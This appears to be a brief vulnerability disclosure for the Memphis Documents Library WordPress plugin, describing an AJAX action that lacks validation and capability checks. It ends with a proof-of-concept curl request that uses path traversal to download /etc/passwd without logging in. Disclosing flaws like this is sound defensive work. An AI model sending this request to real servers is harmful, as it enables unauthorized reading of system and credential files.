Memphis Documents Library [Unauthenticated Arbitrary File Download]
Plugin Memphis Documents Library registers the AJAX action
which provides a convenient way to execute many of the plugin’s
functionalities. Nearly all of them that are provided by this hook, lack
of proper input validation, capabilities checks, output escaping etc.
At least one of the functionalities that are provided by this AJAX action can be used to download arbitrary files from the server.
curl 'http://sbwp2.dev/wp-admin/admin-ajax.php' \ -d 'action=myajax-submit&type=mdocs-export&zip-file=/../etc/passwd'